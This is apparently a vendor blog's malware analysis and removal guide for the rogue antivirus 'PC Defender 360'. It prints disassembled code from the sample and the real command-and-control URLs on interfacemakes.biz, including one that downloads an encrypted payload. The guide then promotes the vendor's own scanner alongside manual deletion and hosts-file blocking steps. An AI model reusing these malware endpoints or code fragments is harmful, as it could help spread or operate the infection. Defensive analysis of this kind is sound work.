009DDDEE    83F8 FF             cmp eax,-0x1
009DDDF1    0F95C2              setne dl
009DDDF4    8BC2                mov eax,edx
009DDDF6    5E                  pop esi
009DDDF7    C9                  leave
009DDDF8    C3                  retn
009DDDF9    57                  push edi
009DDDFA    6A 01               push 0x1
009DDDFC    6A 23               push 0x23
009DDDFE    56                  push esi
009DDDFF    6A 00               push 0x0
009DDE01    FF15 F0F09D00       call dword ptr ds:[0x9DF0F0]             ; shell32.SHGetSpecialFolderPathW
009DDE07    BF 44F59D00         mov edi,0x9DF544                         ; \
009DDE0C    8BCF                mov ecx,edi
009DDE0E    8BC6                mov eax,esi
009DDE10    E8 DBF8FFFF         call 009DD6F0
009DDE15    B9 58F39D00         mov ecx,0x9DF358                         ; ifdstore
009DDE1A    E8 D1F8FFFF         call 009DD6F0
009DDE1F    8BCF                mov ecx,edi
009DDE21    E8 CAF8FFFF         call 009DD6F0
009DDE26    56                  push esi
009DDE27    E8 20FFFFFF         call 009DDD4C
009DDE2C    59                  pop ecx
009DDE2D    5F                  pop edi
009DDE2E    C3                  retn

 

Following, PC Defender 360 starts to get the system information about the compromised computer.

 
009DDF1F    55                  push ebp
009DDF20    8D6C24 88           lea ebp,dword ptr ss:[esp-0x78]
009DDF24    81EC 40010000       sub esp,0x140
009DDF2A    833D 00009E00 FF    cmp dword ptr ds:[0x9E0000],-0x1
009DDF31    0F85 BC000000       jnz 009DDFF3
009DDF37    8325 00009E00 00    and dword ptr ds:[0x9E0000],0x0
009DDF3E    8D85 38FFFFFF       lea eax,dword ptr ss:[ebp-0xC8]
009DDF44    50                  push eax
009DDF45    C785 38FFFFFF 1C010>mov dword ptr ss:[ebp-0xC8],0x11C
009DDF4F    FF15 DCF09D00       call dword ptr ds:[0x9DF0DC]             ; kernel32.GetVersionExW
009DDF55    68 60F59D00         push 0x9DF560                            ; GetNativeSystemInfo
009DDF5A    68 74F59D00         push 0x9DF574                            ; kernel32.dll
009DDF5F    FF15 D8F09D00       call dword ptr ds:[0x9DF0D8]             ; kernel32.GetModuleHandleW
009DDF65    50                  push eax
009DDF66    FF15 24F09D00       call dword ptr ds:[0x9DF024]             ; kernel32.GetProcAddress
009DDF6C    85C0                test eax,eax
009DDF6E    75 05               jnz short 009DDF75
009DDF70    A1 D4F09D00         mov eax,dword ptr ds:[0x9DF0D4]
009DDF75    8D4D 54             lea ecx,dword ptr ss:[ebp+0x54]
009DDF78    51                  push ecx
009DDF79    FFD0                call eax
009DDF7B    8B85 3CFFFFFF       mov eax,dword ptr ss:[ebp-0xC4]
009DDF81    33C9                xor ecx,ecx
009DDF83    66:394D 54          cmp word ptr ss:[ebp+0x54],cx
009DDF87    0F95C1              setne cl
009DDF8A    83E8 05             sub eax,0x5
009DDF8D    890D 28009E00       mov dword ptr ds:[0x9E0028],ecx
009DDF93    74 35               je short 009DDFCA
009DDF95    48                  dec eax
009DDF96    75 61               jnz short 009DDFF9
009DDF98    8B85 40FFFFFF       mov eax,dword ptr ss:[ebp-0xC0]
009DDF9E    83E8 00             sub eax,0x0
009DDFA1    74 10               je short 009DDFB3
009DDFA3    48                  dec eax
009DDFA4    75 53               jnz short 009DDFF9
009DDFA6    807D 52 01          cmp byte ptr ss:[ebp+0x52],0x1
009DDFAA    0F95C0              setne al
009DDFAD    8D4400 03           lea eax,dword ptr ds:[eax+eax+0x3]
009DDFB1    EB 10               jmp short 009DDFC3
009DDFB3    33C0                xor eax,eax
009DDFB5    807D 52 01          cmp byte ptr ss:[ebp+0x52],0x1
009DDFB9    0F95C0              setne al
009DDFBC    48                  dec eax
009DDFBD    83E0 FD             and eax,-0x3
009DDFC0    83C0 05             add eax,0x5
009DDFC3    A3 00009E00         mov dword ptr ds:[0x9E0000],eax
009DDFC8    EB 2F               jmp short 009DDFF9
009DDFCA    33C0                xor eax,eax
009DDFCC    40                  inc eax
009DDFCD    3985 40FFFFFF       cmp dword ptr ss:[ebp-0xC0],eax
009DDFD3  ^ 76 EE               jbe short 009DDFC3
009DDFD5    83BD 40FFFFFF 02    cmp dword ptr ss:[ebp-0xC0],0x2
009DDFDC    75 1B               jnz short 009DDFF9
009DDFDE    3845 52             cmp byte ptr ss:[ebp+0x52],al
009DDFE1    75 04               jnz short 009DDFE7
009DDFE3    85C9                test ecx,ecx
009DDFE5  ^ 75 DC               jnz short 009DDFC3
009DDFE7    C705 00009E00 04000>mov dword ptr ds:[0x9E0000],0x4
009DDFF1    EB 06               jmp short 009DDFF9
009DDFF3    8B0D 28009E00       mov ecx,dword ptr ds:[0x9E0028]
009DDFF9    85FF                test edi,edi
009DDFFB    74 02               je short 009DDFFF
009DDFFD    890F                mov dword ptr ds:[edi],ecx
009DDFFF    A1 00009E00         mov eax,dword ptr ds:[0x9E0000]
009DE004    83C5 78             add ebp,0x78
009DE007    C9                  leave
009DE008    C3                  retn

 

Once again, PC Defender 360 visits the malicious website to get all needed parameter.

 

009D6705   push 0x9DF384                             http://interfacemakes.biz/postload2/?uid=%S
009D7507   push 0x9DF3BC                             http://interfacemakes.biz/api/test
009D875F   push 0x9DF3F0                             http://interfacemakes.biz/api/ping?stage=1&uid=%S&id=%d&subid=%d&os=%d&avf=%d

 

After loading on the malicious domain, PC Defender 360 will download the SCC file (The PE file after the encryption processing), and then decrypt as “idfdata.bin”.

 
009D8BF3   push 0x9DF46C                             http://interfacemakes.biz/content/scc
009DA6F7   push 0x9DF498                             http://interfacemakes.biz/api/ping?stage=2&uid=%S&success=%d
009DAB59   push 0x9DF4F4                             http://interfacemakes.biz/load/?uid=%S

 

How to Remove PC Defender 360? (Removal Guide)

 
Optional I Remove PC Defender 360 with automatic Remover Anvi Smart Defender
 
Step 1 > Reboot your computer into Safe Mode with Networking. To do this, turn your computer off and then back on and immediately when you see anything on the screen, start tapping the F8 key on your keyboard. Eventually you will be brought to a menu similar to the one below:
 
boot into safe mode
 
Using the arrow keys on your keyboard, select Safe Mode with Networking and press Enter on your keyboard.
 

Step 2 > Download, install the automatic remover-Anvi Smart Defender to scan out and remove the residing files of the PC Defender 360 infection.

 

Anvi Smart Defender is a powerful anti-malware program which is designed to detect and remove virus, malware, Trojan, worms and PUP. You are highly recommended to download and install the free or paid version of Anvi Smart Defender to remove any possible potential unwanted program related to PC Defender 360.
 

1. Download and install the paid or free version of Anvi Smart Defender Anti-malware software.
 

 
2. After you install the program, please open it, and switch to Scan tab, perform quick or full scan to eliminate possible virus infection file. Anvi Smart Defender will scan registry objects automatically to make sure your registry entries are clean and neat.
 
3. Once the scan is over, you can click view button to check the detail information of the detection. Please make sure to click “Remove” button to completely remove the malicious files from your computer.
 

 
 
Option II Remove PC Defender 360 manually
 
1. Make sure that you can see hidden and operating system protected files in Windows.
 
Open Folder Options by clicking the Start button, clicking Control Panel, clicking Appearance and Personalization, and then clicking Folder Options.
 


 
Click the View tab. Under Advanced settings, click Show hidden files, folders, and drives, and then click OK.
 


 

2. Delete the malicious files created by PC Defender 360.
 
For Windows XP/2003 users, go to
 
C:\Documents and Settings\All Users\Application Data\ifdstore\*.*
C:\Documents and Settings\All Users\Desktop\PC Defender 360.lnk
 
For Windows 7/Vista/8 users, go to
 
C:\Users\Default\AppData\Local\ifdstore\*.*
C:\Users\Default\Desktop\PC Defender 360.lnk

 

 

3. Remove malicious registry entries added by PC Defender 360
 
Click on the “Start” button and in the “Search programs and files” field, type “regedit” and click the “Enter” button.
 

 
To delete all malicious files and registry entries of PC Defender 360, go to Edit > Find, in the search box text PC Defender 360 and ifdstore, then click on the Find Next, it will show you all the PC Defender 360 registry and files, right click on those items and Delete all of them.
 

 
Please make sure delete all registries entries related to PC Defender 360.
 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ifdstore
 

4. Block the malicious domain-interfacemakes.biz and coordinizespart.biz.
 

Go to: C:\WINDOWS\system32\drivers\etc.

Double-click “hosts” file to open it. Choose to open with Notepad.

The default hosts file should be only one line: 127.0.0.1 localhost in Windows XP and 127.0.0.1 localhost ::1 in Windows Vista.

Please add the following items behide the default line.

127.0.0.1 interfacemakes.biz
127.0.0.1 coordinizespart.biz

That’s all manual and automatic removal instruction about PC Defender 360 virus, should you have any problem, please leave a reply below, we will try our best to reply you as soon as possible.

Comments are closed.